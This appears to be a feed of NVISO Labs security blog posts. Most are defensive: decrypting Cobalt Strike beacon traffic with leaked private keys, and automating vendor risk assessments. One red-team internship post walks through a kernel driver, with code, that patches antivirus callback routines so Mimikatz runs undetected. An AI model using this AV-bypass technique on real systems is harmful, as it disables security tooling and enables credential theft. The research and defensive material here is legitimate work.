This is a GET request for /ptj that receives a STATUS 200 reply with no data. This means that there are no commands from the team server for this beacon for now: the operator has not issued any commands at that point in the capture file.

Remark the Cookie header of the GET request. This looks like a BASE64 string: KN9zfIq31DBBdLtF4JUjmrhm0lRKkC/I/zAiJ+Xxjz787h9yh35cRjEnXJAwQcWP4chXobXT/E5YrZjgreeGTrORnj//A5iZw2TClEnt++gLMyMHwgjsnvg9czGx6Ekpz0L1uEfkVoo4MpQ0/kJk9myZagRrPrFWdE9U7BwCzlE=

That value is encrypted metadata that the beacon sends as a BASE64 string to the team server. This metadata is RSA encrypted with the public key inside the beacon configuration (option 0x0007), and the team server can decrypt this metadata because it has the private key. Remember that some private keys have been “leaked”, we discussed this in our first blog post in this series.

Our beacon analysis showed that this beacon uses a public key with a known private key. This means we can use tool cs-decrypt-metadata.py to decrypt the metadata (cookie) like this:

Figure 12: decrypting beacon metadata

We can see here the decrypted metadata. Very important to us is the raw key: caeab4f452fe41182d504aa24966fbd0. We will use this key to decrypt traffic (the AES and HMAC keys are derived from this raw key).
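As a minimal sketch of that derivation (an assumption mirroring the decryption tools: the SHA-256 digest of the 16-byte raw key is split into two 16-byte halves, one half serving as the AES-128 key and the other as the HMAC key):

#include <stdio.h>
#include <openssl/sha.h>

int main(void)
{
    //the raw key recovered from the decrypted metadata
    unsigned char rawkey[16] = {
        0xca, 0xea, 0xb4, 0xf4, 0x52, 0xfe, 0x41, 0x18,
        0x2d, 0x50, 0x4a, 0xa2, 0x49, 0x66, 0xfb, 0xd0
    };
    unsigned char digest[SHA256_DIGEST_LENGTH];
    SHA256(rawkey, sizeof(rawkey), digest);

    //print both 16-byte halves; one is the AES key, the other the HMAC key
    for (int i = 0; i < SHA256_DIGEST_LENGTH; i++)
    {
        printf("%02x", digest[i]);
        if (i == 15)
            printf(" | ");
    }
    printf("\n");
    return 0;
}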

Other metadata we can find here includes the computer name, the username, …

We will now follow the HTTP stream with packets 9379 and 9383: this is the first command sent by the operator (team server) to the beacon:

Figure 13: HTTP stream with encrypted command

Here we can see that the reply contains 48 bytes of data (Content-length). That data is encrypted:

Figure 14: hexadecimal view of HTTP stream with encrypted command

Encrypted data like this can be decrypted with tool cs-parse-http-traffic.py. Since the data is encrypted, we need to provide the raw key (option -r caeab4f452fe41182d504aa24966fbd0), and as the packet capture contains other traffic than pure Cobalt Strike C2 traffic, it is best to provide a display filter (option -Y "http and ip.addr == 192.254.79.71 and frame.number > 6703") so that the tool can ignore all HTTP traffic that is not C2 traffic.
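An illustrative invocation would look like this (the pcap filename is shortened here for readability):

cs-parse-http-traffic.py -r caeab4f452fe41182d504aa24966fbd0 -Y "http and ip.addr == 192.254.79.71 and frame.number > 6703" capture.pcap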

This produces the following output:

Figure 15: decrypted commands and results

Now we can see that the encrypted data in packet 9383 is a sleep command, with a sleep time of 100 ms and a jitter factor of 90%. This means that the operator instructed the beacon to check in almost continuously, i.e. to go interactive.

Decrypted packet 9707 contains an unknown command (id 53), but when we look at packet 9723, we see a directory listing output: this is the output of the unknown command 53 being sent back to the team server (notice the POST url /submit.php). Thus it’s safe to assume that command 53 is a directory listing command.

There are many commands and results in this capture file that tool cs-parse-http-traffic.py can decrypt, too many to show here. But we invite you to reproduce the commands in this blog post, and review the output of the tool.

The last command in the capture file is a process listing command:

Figure 16: decrypted process listing command and result

Conclusion

Although the packet capture file we decrypted here was produced more than half a year ago by Brad Duncan by running a malicious Cobalt Strike beacon inside a sandbox, we can decrypt it today because the operators used a rogue Cobalt Strike package whose private key we recovered from VirusTotal.

Without this private key, we would not be able to decrypt the traffic.

The private key is not the only way to decrypt the traffic: if the AES key can be extracted from process memory, we can also decrypt traffic. We will cover this in an upcoming blog post.

About the authors
Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

✇ NVISO Labs

Automate, automate, automate: Three Ways to Increase the Value from Third Party Risk Management Efforts

By: Pieter Batsleer

Third Party Risk Management (“TPRM”) efforts are often considered labour-intensive, with numerous tedious, manual steps. Often, as much effort goes into managing the process as into focusing on the actual risks. To avoid this, we’d like to share three ways in which we’ve been boosting our own TPRM efficiency – through automation of three crucial phases in the third party risk assessment process:

(1) during initiation (the business risk/criticality assessment),

(2) while performing your third party (due diligence) assessments and

(3) during the monitoring phase following the assessment.

This article elaborates further on the automation of the above.

  1. Automate the third-party criticality assessment

When you are applying a risk-based approach to your TPRM efforts, third party assessments are initiated with a criticality or business risk assessment using information from the business owner working with the third party. Most of our customers will document the criticality assessment in an Excel file with a lot of back-and-forth communication.

When reviewing the intake form, we realised that the intake could be distilled to a few multiple-choice questions, such as the highest category of data the third party can access, the level of system access and so on. We created the possibility for the customer to conduct a short, simplified assessment through Microsoft Forms. This is easily available through one single link and avoids clutter (caused by different versions of Excel files, for example). In addition, through Microsoft Flow, the output from that Form is automatically captured and imported into a repository. Finally, we made sure an MS Planner task is created for each new assessment, which triggers the involvement of the security second line function.

Figure 1: Gathering the MS Forms output, assigning an assessment ID and storing the gathered criticality assessment input data.
Figure 2: Summarising the outcome in an email to security team (for validation) and creation of a task for follow-up through MS Planner.

This approach results in a significant increase in value because it can:

  • Give the business owner a more user-friendly GUI than the Excel sheet they are expected to complete.
  • Enable owners to initiate a third-party security assessment at any given time, without requiring initiation by the second line.
  • Empower the second line to focus on understanding and challenging the provided input.
  • Improve the administrative aspects of the third-party security risk assessments so they are completed within a short time frame.

Do you want to take it to the next level? Integrate an automated approval through Power Automate for the security team.

The above case requires only low-effort customisation to fully tailor it to your organisation, and it guarantees time efficiencies and better flexibility.

  2. Automate the execution of the assessments by leveraging tooling

You might still be wondering: how do we finally get rid of those Excel files we exchange with our third parties? You could address this by using tooling throughout the assessment process. By leveraging these tools (such as Ceeyu, OneTrust Vendorpedia, Security Scorecard Atlas, Qualys SAQ, Prevalent and more), not only the tedious tasks of the criticality assessment, but also those of the subsequent third party due diligence assessment, can be automated. Examples of tasks we have automated with such tooling include:

  • The exchange of the due diligence questionnaires.
  • The uploading and collecting of supporting evidence.
  • The tracking of the overall progress of the assessment (including the history of the review), and
  • Reporting of the assessment outcome and scoring (including comparison of vendors).

Again, the result is a significant increase in value, and you can:

  • Reduce time-to-market: cut the administrative overhead per assessment, reducing the average lead time of an assessment.
  • Identify bottlenecks: a centralized overview of each assessment’s actual status lets you clearly pinpoint where an assessment gets stuck.
  • Free up valuable time: allow the security team reviewing the provided input to focus their time on what really matters: reviewing the output.
  • Leverage reporting possibilities: minimise the effort of creating custom management reports by using the cutting-edge built-in reporting features.

Of course, this requires having the right tools at your disposal – however, implemented at scale, the efficiency and quality returns of the tools nearly always surpass their cost. At NVISO for example, we’ve been able to decrease our nominal assessment cost by about 20%, and our tool provides a portal that brings our customers transparency and visibility on the handling of incoming TPRM requests.

  3. Automate the monitoring and follow-up on agreed actions by leveraging tooling

In order to maximise automation, you should also consider it for your monitoring actions. Very often, assessments remain a point-in-time assessment (“snapshot”) which only paints a partial picture of how seriously your third parties take security. It is of equal importance to monitor their efforts to improve their security posture over time – i.e. the timely and effective implementation of your recommendations, and the evolution of their overall security posture. Automation can also play a major role in this process.

Here too, you create additional value because you can:

  • Automate action plan monitoring: send automated reminders to the third parties in line with set due dates for identified follow-up actions.
  • Automate escalation: escalate to the business owner in case of overdue actions, potentially with different business rules depending on the business criticality of the supplier.
  • Free up valuable time: reducing manual interventions for your second line team helps it focus on what really matters: is the identified action effectively addressed? Is the remediation effective in reducing the risk? We typically adopt a risk-driven, sample-based approach in verifying this.
  • Stay up to date: trigger automated reinitiation of assessments when they are due for a third party.

To facilitate this, you will again require the right tools at your disposal. A dedicated TPRM tool is a plus, although it’s perfectly feasible to realise this through Microsoft 365, for example. This monitoring process is also something we offer as an option in our TPRM as a service solution.

Conclusion

To summarise: all of the above automation efforts (even through leveraging tools you might already have at hand) can significantly increase the value you get from your efforts in the Third Party Risk Management (TPRM) process. Customers, as well as third parties, see the benefits of these automation initiatives in the process: it reduces their involvement, it’s easier to track the various assessments and eventually it allows them to focus on the outcome of their TPRM efforts.

If you are looking at ways to boost your TPRM efforts and are seeking assistance in implementing this within your organisation, don’t hesitate to reach out to me through [email protected].

✇ NVISO Labs

Kernel Karnage – Part 1

By: bautersj

I start the first week of my internship in true spooktober fashion as I dive into a daunting subject that’s been scaring me for some time now: The Windows Kernel.

1. KdPrint(“Hello, world!\n”);

When I finished my previous internship, which was focused on bypassing Endpoint Detection and Response (EDR) software and Anti-Virus (AV) software from a user land point of view, we joked around with the idea that the next topic would be defeating the same problem but from kernel land. At that point in time, I had no experience at all with the Windows kernel and it all seemed very advanced and above my level of technical ability. As I write this blogpost, I have to admit it wasn’t as scary or difficult as I thought it to be; C/C++ is still C/C++ and assembly instructions are still headache-inducing, but comprehensible with the right resources and time dedication.

In this first post, I will lay out some of the technical concepts and ideas behind the goal of this internship, as well as reflect back on my first steps in successfully bypassing/disabling a reputable Anti-Virus product, but more on that later.

2. BugCheck?

To set this rollercoaster in motion, I highly recommend checking out this post in which I briefly covered User Space (and Kernel Space to a certain extent) and how EDRs interact with them.

User Space vs Kernel Space

In short, the Windows OS roughly consists of 2 layers, User Space and Kernel Space.

User Space or user land contains the Windows Native API: ntdll.dll, the WIN32 subsystem: kernel32.dll, user32.dll, advapi32.dll,... and all the user processes and applications. When applications or processes need more advanced access or control to hardware devices, memory, CPU, etc., they will use ntdll.dll to talk to the Windows kernel.

The functions contained in ntdll.dll will load a number, called “the system service number”, into the EAX register of the CPU and then execute the syscall instruction (on x64), which starts the transition to kernel mode while jumping to a predefined routine called the system service dispatcher. The system service dispatcher performs a lookup in the System Service Dispatch Table (SSDT) using the number in the EAX register as an index. The code then jumps to the relevant system service and returns to user mode upon completion of execution.
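A representative ntdll.dll stub illustrates this pattern (the service number 0x55 below is purely illustrative; the real numbers vary per function and per Windows build):

mov r10, rcx      ; preserve the first argument
mov eax, 55h      ; load the system service number
syscall           ; transition to kernel mode
ret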

Kernel Space or kernel land is the bottom layer in between User Space and the hardware and consists of a number of different elements. At the heart of Kernel Space we find ntoskrnl.exe or as we’ll call it: the kernel. This executable houses the most critical OS code, like thread scheduling, interrupt and exception dispatching, and various kernel primitives. It also contains the different managers such as the I/O manager and memory manager. Next to the kernel itself, we find device drivers, which are loadable kernel modules. I will mostly be messing around with these, since they run fully in kernel mode. Apart from the kernel itself and the various drivers, Kernel Space also houses the Hardware Abstraction Layer (HAL), win32k.sys, which mainly handles the User Interface (UI), and various system and subsystem processes (Lsass.exe, Winlogon.exe, Services.exe, etc.), but they’re less relevant in relation to EDRs/AVs.

As opposed to User Space, where every process has its own virtual address space, all code running in Kernel Space shares a single common virtual address space. This means that a kernel-mode driver can overwrite or write to memory belonging to other drivers, or even the kernel itself. When this occurs and results in the driver crashing, the entire operating system will crash.

In 2005, with the first x64 edition of Windows XP, Microsoft introduced a new feature called Kernel Patch Protection (KPP), colloquially known as PatchGuard. PatchGuard is responsible for protecting the integrity of the Windows kernel, by hashing its critical structures and performing comparisons at random time intervals. When PatchGuard detects a modification, it will immediately Bugcheck the system (KeBugCheck(0x109);), resulting in the infamous Blue Screen Of Death (BSOD) with the message: “CRITICAL_STRUCTURE_CORRUPTION”.

bugcheck

3. A battle on two fronts

The goal of this internship is to develop a kernel driver that will be able to disable, bypass, mislead, or otherwise hinder EDR/AV software on a target. So what exactly is a driver, and why do we need one?

As stated in the Microsoft documentation, a driver is a software component that lets the operating system and a device communicate with each other. Most of us are familiar with the term “graphics card driver”; we frequently need to update it to support the latest and greatest games. However, not all drivers are tied to a piece of hardware; there is a separate class of drivers called Software Drivers.

software driver

Software drivers run in kernel mode and are used to access protected data that is only available in kernel mode, from a user mode application. To understand why we need a driver, we have to look back in time and take into consideration how EDR/AV products work or used to work.

Obligatory disclaimer: I am by no means an expert and a lot of the information used to write this blog post comes from sources which may or may not be trustworthy, complete or accurate.

EDR/AV products have adapted and evolved over time with the increased complexity of exploits and attacks. A common way to detect malicious activity is for the EDR/AV to hook the WIN32 API functions in user land and transfer execution to itself. This way when a process or application calls a WIN32 API function, it will pass through the EDR/AV so it can be inspected and either allowed, or terminated. Malware authors bypassed this hooking method by directly using the underlying Windows Native API (ntdll.dll) functions instead, leaving the WIN32 API functions mostly untouched. Naturally, the EDR/AV products adapted, and started hooking the Windows Native API functions. Malware authors have used several methods to circumvent these hooks, using techniques such as direct syscalls, unhooking and more. I recommend checking out A tale of EDR bypass methods by @ShitSecure (S3cur3Th1sSh1t).

When the battle could no longer be fought in user land (since the Windows Native API is the lowest level), it transitioned into kernel land. Instead of hooking the Native API functions, EDR/AV started patching the System Service Dispatch Table (SSDT). Sounds familiar? When execution from ntdll.dll is transitioned to the system service dispatcher, the lookup in the SSDT will yield a memory address belonging to an EDR/AV function instead of the original system service. This practice of patching the SSDT is risky at best, because it affects the entire operating system and if something goes wrong it will result in a crash.

With the introduction of PatchGuard (KPP), Microsoft put an end to SSDT patching in x64 versions of Windows (x86 is unaffected) and instead introduced a new feature called Kernel Callbacks. A driver can register a callback for a certain action. When this action is performed, the driver will receive either a pre- or post-action notification.

EDR/AV products make heavy use of these callbacks to perform their inspections. A good example would be the PsSetCreateProcessNotifyRoutine() callback:

  1. When a user application wants to spawn a new process, it will call the CreateProcessW() function in kernel32.dll, which will then trigger the create process callback, letting the kernel know a new process is about to be created.
  2. Meanwhile the EDR/AV driver has implemented the PsSetCreateProcessNotifyRoutine() callback and assigned one of its functions (0xFA7F) to that callback.
  3. The kernel registers the EDR/AV driver function address (0xFA7F) in the callback array.
  4. The kernel receives the process creation callback from CreateProcessW() and sends a notification to all the registered drivers in the callback array.
  5. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  6. The EDR/AV driver function (0xFA7F) instructs the EDR/AV application running in user land to inject into the User Application’s virtual address space and hook ntdll.dll to transfer execution to itself.
kernel callback
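From the driver’s perspective, registering such a callback is a single API call. A minimal sketch using the documented Ex variant of the routine (error handling omitted):

VOID ProcessNotifyCallback(PEPROCESS Process, HANDLE ProcessId, PPS_CREATE_NOTIFY_INFO CreateInfo)
{
    if (CreateInfo != NULL)
    {
        //pre-creation notification: inspect CreateInfo->ImageFileName, CreateInfo->CommandLine, ...
        //a security product could deny the creation by setting CreateInfo->CreationStatus
    }
    else
    {
        //post-action notification: the process identified by ProcessId is exiting
    }
}

//during DriverEntry: register the callback (FALSE = add, TRUE = remove)
NTSTATUS status = PsSetCreateProcessNotifyRoutineEx(ProcessNotifyCallback, FALSE);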

With EDR/AV products transitioning to kernel space, malware authors had to follow suit and bring their own kernel driver to get back on equal footing. The job of the malicious driver is fairly straightforward: eliminate the kernel callbacks to the EDR/AV driver. So how can this be achieved?

  1. An evil application in user space is aware we want to run Mimikatz.exe, a well known tool to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory.
  2. The evil application instructs the evil driver to disable the EDR/AV product.
  3. The evil driver will first locate and read the callback array and then patch any entries belonging to EDR/AV drivers by replacing the first instruction in their callback function (0xFA7F) with a return RET (0xC3) instruction.
  4. Mimikatz.exe can now run and will call ReadProcessMemory(), which will trigger a callback.
  5. The kernel receives the callback and sends a notification to all the registered drivers in the callback array.
  6. The EDR/AV driver receives the process creation notification and executes its assigned function (0xFA7F).
  7. The EDR/AV driver function (0xFA7F) executes the RET (0xC3) instruction and immediately returns.
  8. Execution resumes with ReadProcessMemory(), which will call NtReadVirtualMemory(), which in turn will execute the syscall and transition into kernel mode to read the lsass.exe process memory.
patch kernel callback
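Conceptually, the patch itself boils down to a single byte write. A heavily simplified sketch (assuming the callback function address has already been resolved from the callback array, and that kernel write protection has been dealt with, e.g. through an MDL mapping):

PUCHAR pCallbackFunction = (PUCHAR)resolvedCallbackAddress;  //resolved from the callback array (hypothetical variable)
UCHAR origByte = *pCallbackFunction;                         //save the original first byte for later restoration

*pCallbackFunction = 0xC3;  //overwrite the first instruction with RET: the callback now returns immediately

//... run tooling undetected ...

*pCallbackFunction = origByte;  //restore the callback to its original state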

4. Don’t reinvent the wheel

Armed with all this knowledge, I set out to put the theory into practice. I stumbled upon Windows Kernel Ps Callback Experiments by @fdiskyou which explains in depth how he wrote his own evil driver and evilcli user application to disable EDR/AV as explained above. To use the project you need Visual Studio 2019 and the latest Windows SDK and WDK.

I also set up two virtual machines configured for remote kernel debugging with WinDbg:

  1. Windows 10 build 19042
  2. Windows 11 build 21996

With the following options enabled:

bcdedit /set TESTSIGNING ON
bcdedit /debug on
bcdedit /dbgsettings serial debugport:2 baudrate:115200
bcdedit /set hypervisorlaunchtype off

To compile and build the driver project, I had to make a few modifications. First the build target should be Debug – x64. Next I converted the current driver into a primitive driver by modifying the evil.inf file to meet the new requirements.

;
; evil.inf
;

[Version]
Signature="$WINDOWS NT$"
Class=System
ClassGuid={4d36e97d-e325-11ce-bfc1-08002be10318}
Provider=%ManufacturerName%
DriverVer=
CatalogFile=evil.cat
PnpLockDown=1

[DestinationDirs]
DefaultDestDir = 12


[SourceDisksNames]
1 = %DiskName%,,,""

[SourceDisksFiles]


[DefaultInstall.ntamd64]

[Standard.NT$ARCH$]


[Strings]
ManufacturerName="<Your manufacturer name>" ;TODO: Replace with your manufacturer name
ClassName=""
DiskName="evil Source Disk"

Once the driver was compiled and signed with a test certificate, I installed it on my Windows 10 VM with WinDbg remotely attached. To see kernel debug messages in WinDbg, I updated the default mask to 8: kd> ed Kd_Default_Mask 8.

sc create evil type= kernel binPath= C:\Users\Cerbersec\Desktop\driver\evil.sys
sc start evil

evil driver
windbg evil driver

Using the evilcli.exe application with the -l flag, I can list all the registered callback routines from the callback array for process creation and thread creation. When I first tried this I immediately bluescreened with the message “Page Fault in Non-Paged Area”.

5. The mystery of 3 bytes

This BSOD message is telling me I’m trying to access non-committed memory, which is an immediate bugcheck. The reason this happened has to do with Windows versioning and the way we find the callback array in memory.

bsod

Locating the callback array in memory by hand is a trivial task and can be done with WinDbg or any other kernel debugger. First we disassemble the PsSetCreateProcessNotifyRoutine() function and look for the first CALL (0xE8) instruction.

PsSetCreateProcessNotifyRoutine

Next we disassemble the PspSetCreateProcessNotifyRoutine() function until we find a LEA (0x4C 0x8D 0x2D) (load effective address) instruction.

PspSetCreateProcessNotifyRoutine

Then we can inspect the memory address that LEA puts in the r13 register. This is the callback array in memory.

callback array

To view the different drivers in the callback array, we need to perform a logical AND operation with the address in the callback array and 0xFFFFFFFFFFFFFFF8.

logical and
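In driver code, the same lookup could look like this (a sketch; it assumes the array entries point to small callback blocks in which the function pointer directly follows an 8-byte rundown reference, with the low 3 bits of each entry used as flags):

for (ULONG64 i = 0; i < 64; i++)  //the process callback array holds up to 64 entries
{
    ULONG64 entry = ((PULONG64)callbackArrayAddress)[i];  //callbackArrayAddress as located above
    ULONG64 block = entry & 0xFFFFFFFFFFFFFFF8;           //mask off the flag bits

    if (block != 0)
    {
        ULONG64 callbackFunction = *(PULONG64)(block + 8);  //function pointer after the rundown reference
        KdPrint(("[+] Callback %llu: %llx\n", i, callbackFunction));
    }
}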

The driver roughly follows the same method to locate the callback array in memory: it calculates offsets to the instructions we looked for manually, relative to the PsSetCreateProcessNotifyRoutine() function base address, which it obtains using the MmGetSystemRoutineAddress() function.

ULONG64 FindPspCreateProcessNotifyRoutine()
{
	LONG OffsetAddr = 0;
	ULONG64	i = 0;
	ULONG64 pCheckArea = 0;
	UNICODE_STRING unstrFunc;

	RtlInitUnicodeString(&unstrFunc, L"PsSetCreateProcessNotifyRoutine");
    //obtain the PsSetCreateProcessNotifyRoutine() function base address
	pCheckArea = (ULONG64)MmGetSystemRoutineAddress(&unstrFunc);
	KdPrint(("[+] PsSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));

    //loop through the base address + 20 bytes and search for the right OPCODE (instruction)
    //we're looking for the 0xE8 OPCODE, which is the CALL instruction
	for (i = pCheckArea; i < pCheckArea + 20; i++)
	{
		if ((*(PUCHAR)i == OPCODE_PSP[g_WindowsIndex]))
		{
			OffsetAddr = 0;

			//copy the 4 bytes after the CALL (0xE8) instruction; they contain the relative offset to the PspSetCreateProcessNotifyRoutine() function
			memcpy(&OffsetAddr, (PUCHAR)(i + 1), 4);
			//resolve the CALL target: instruction address + relative offset + instruction length (5 bytes)
			pCheckArea = pCheckArea + (i - pCheckArea) + OffsetAddr + 5;

			break;
		}
	}

	KdPrint(("[+] PspSetCreateProcessNotifyRoutine is at address: %llx \n", pCheckArea));
	
    //loop through the PspSetCreateProcessNotifyRoutine base address + 0xFF bytes and search for the right OPCODES (instructions)
    //we're looking for the 0x4C 0x8D 0x2D OPCODES, which form the LEA r13 instruction
	for (i = pCheckArea; i < pCheckArea + 0xff; i++)
	{
		if (*(PUCHAR)i == OPCODE_LEA_R13_1[g_WindowsIndex] && *(PUCHAR)(i + 1) == OPCODE_LEA_R13_2[g_WindowsIndex] && *(PUCHAR)(i + 2) == OPCODE_LEA_R13_3[g_WindowsIndex])
		{
			OffsetAddr = 0;

            //copy the 4 bytes after the LEA r13 (0x4C 0x8D 0x2D) instruction; they contain the relative offset to the callback array
			memcpy(&OffsetAddr, (PUCHAR)(i + 3), 4);
            //resolve the absolute address of the callback array: instruction address + relative offset + instruction length (7 bytes)
			return OffsetAddr + 7 + i;
		}
	}

	KdPrint(("[+] Returning from CreateProcessNotifyRoutine \n"));
	return 0;
}

The takeaways here are the OPCODE_*[g_WindowsIndex] constructions, where the OPCODE_* arrays are defined as:

UCHAR OPCODE_PSP[]	 = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8, 0xe8 };
//process callbacks
UCHAR OPCODE_LEA_R13_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c, 0x4c };
UCHAR OPCODE_LEA_R13_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_R13_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d, 0x2d };
// thread callbacks
UCHAR OPCODE_LEA_RCX_1[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x48, 0x48, 0x48, 0x48, 0x48 };
UCHAR OPCODE_LEA_RCX_2[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d, 0x8d };
UCHAR OPCODE_LEA_RCX_3[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d, 0x0d };

And g_WindowsIndex acts as an index based on the Windows build number of the machine (osVersionInfo.dwBuildNumber).
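A sketch of what such a mapping could look like (the index values below are illustrative, not the project's actual table; the important part is that an unsupported build falls back to index 0, where the opcode arrays contain 0x00):

ULONG GetWindowsIndex(ULONG dwBuildNumber)
{
    switch (dwBuildNumber)
    {
    case 17763: return 15;  //Windows 10 1809 (illustrative)
    case 18362:
    case 18363: return 16;  //Windows 10 1903/1909 (illustrative)
    case 19041:
    case 19042: return 17;  //Windows 10 2004/20H2 (illustrative)
    case 21996: return 19;  //Windows 11 preview build (illustrative)
    default:    return 0;   //unsupported build -> zeroed opcodes
    }
}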

To solve the mystery of the BSOD, I compared debug output with manual calculations and found out that my driver had been looking for the 0x00 OPCODE instead of the 0xE8 (CALL) OPCODE to obtain the base address of the PspSetCreateProcessNotifyRoutine() function. The first 0x00 OPCODE it finds is located at a 3-byte offset from the 0xE8 OPCODE, resulting in an invalid offset being copied by the memcpy() function.

After adjusting the OPCODE array and the function responsible for calculating the index from the Windows build number, the driver worked just fine.

list callback array

6. Driver vs Anti-Virus

To put the driver to the test, I installed it on my Windows 11 VM together with a reputable anti-virus product. After patching the AV driver callback routines in the callback array, mimikatz.exe was successfully executed.

When returning the AV driver callback routines back to their original state, mimikatz.exe was detected and blocked upon execution.

7. Conclusion

We started this first internship post by looking at User vs Kernel Space and how EDRs interact with them. Since the goal of the internship is to develop a kernel driver to hinder EDR/AV software on a target, we have then discussed the concept of kernel drivers and kernel callbacks and how they are used by security software. As a first practical example, we used evilcli, combined with some BSOD debugging to patch the kernel callbacks used by an AV product and have Mimikatz execute undetected.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

✇ NVISO Labs

Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1

By: Didier Stevens

We found 6 private keys for rogue Cobalt Strike software, enabling C2 network traffic decryption.

The communication between a Cobalt Strike beacon (client) and a Cobalt Strike team server (C2) is encrypted with AES (even when it takes place over HTTPS). The AES key is generated by the beacon, and communicated to the C2 using an encrypted metadata blob (a cookie, by default).

RSA encryption is used to encrypt this metadata: the beacon has the public key of the C2, and the C2 has the private key.

Figure 1: C2 traffic

Public and private keys are stored in file .cobaltstrike.beacon_keys. These keys are generated when the Cobalt Strike team server software is used for the first time.

During our fingerprinting of Internet-facing Cobalt Strike servers, we found public keys that are used by many different servers. This implies that they use the same private key, and thus that their .cobaltstrike.beacon_keys file is shared.

One possible explanation, which we set out to verify: are there cracked versions of Cobalt Strike, used by malicious actors, that include a .cobaltstrike.beacon_keys file? This file is not part of a legitimate Cobalt Strike package, as it is generated at first-time use.

Searching through VirusTotal, we found 10 cracked Cobalt Strike packages: ZIP files containing a file named .cobaltstrike.beacon_keys. Out of these 10 packages, we extracted 6 unique RSA key pairs.

2 of these pairs are prevalent on the Internet: 25% of the Cobalt Strike servers we fingerprinted (1500+) use one of these 2 key pairs.

This key information is now included in tool 1768.py, a tool developed by Didier Stevens to extract configurations of Cobalt Strike beacons.

Whenever a public key with a known private key is extracted, the tool highlights this:

Figure 2: 1768.py extracting configuration from beacon

At a minimum, this information is further confirmation that the sample came from a rogue Cobalt Strike server (and not a red team server).

Using the verbose option, the private key is also displayed.

Figure 3: using option verbose to display the private key

This can then be used to decrypt the metadata, and the C2 traffic (more on this later).

Figure 4: decrypting metadata

In upcoming blog posts, we will show in detail how to use these private keys to decrypt metadata and decrypt C2 traffic.

About the authors
Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

✇ NVISO Labs

All aboard the internship – whispering past defenses and sailing into kernel space

By: bautersj

Previously, we have already published Sander’s (@cerbersec) internship testimony. Since this post does not really contain any juicy technical details and Sander has done a terrific job putting together a walkthrough of his process, we thought it would be a waste not to highlight his previous posts again.

In Part 1, Sander explains how he started his journey and dove into process injection techniques, WIN32 API (hooking), userland vs kernel space, and Cobalt Strike’s Beacon Object Files (BOF).

Just being able to perform process injection using direct syscalls from a BOF did not signal the end of his journey yet – on the contrary. In Part 2, Sander extended our BOF arsenal with additional process injection techniques and persistence. With all this functionality bundled in an Aggressor Script, CobaltWispers was born.

We are considering open-sourcing this little framework, but some final tweaks would be required first, as explained in the part 2 blog post.

While this is the end (for now) of Sander’s BOF journey, we have another challenging topic lined up for him: The Kernel. Here’s a little sneak peek of the next blog series/walkthrough we will be releasing. Stay tuned!


KdPrint(“Hello, world!\n”);

When I finished my previous internship, which was focused on bypassing Endpoint Detection and Response (EDR) software and Anti-Virus (AV) software from a user land point of view, we joked around with the idea that the next topic would be defeating the same problem but from kernel land. At that point in time I had no experience at all with the Windows kernel and it all seemed very advanced and above my level of technical ability. As I write this blogpost, I have to admit it wasn’t as scary or difficult as I thought it to be. C/C++ is still C/C++ and assembly instructions are still headache-inducing, but comprehensible with the right resources and time dedication.

In this first post, I will lay out some of the technical concepts and ideas behind the goal of this internship, as well as reflect back on my first steps in successfully bypassing/disabling a reputable Anti-Virus product, but more on that later.


About the authors

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.
Sander is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

✇ NVISO Labs

Phish, Phished, Phisher: A Quick Peek Inside a Telegram Harvester

By: Maxime Thiebaut

The tale is told by many: to access this document, “Sign in to your account” — During our daily Managed Detection and Response operations, NVISO handles hundreds of user-reported phishing threats which made it past commercial anti-phishing solutions. To ensure user safety, each report is carefully reviewed for Indicators of Compromise (IoCs) which are blocked and shared in threat intelligence feeds.

It is quite common to observe phishing pages on compromised hosts, legitimate services or, as will be the case for this blog post, directly delivered as an attachment. While it is trivial to get a phishing page, identifying a campaign’s extent usually requires global telemetry.

In one of the smaller campaigns we monitored last month (September 2021), the threat actor inadvertently exposed Telegram credentials to their harvester. This opportunity provided us some insight into their operations; a peek behind the curtains we wanted to share.

From Phish

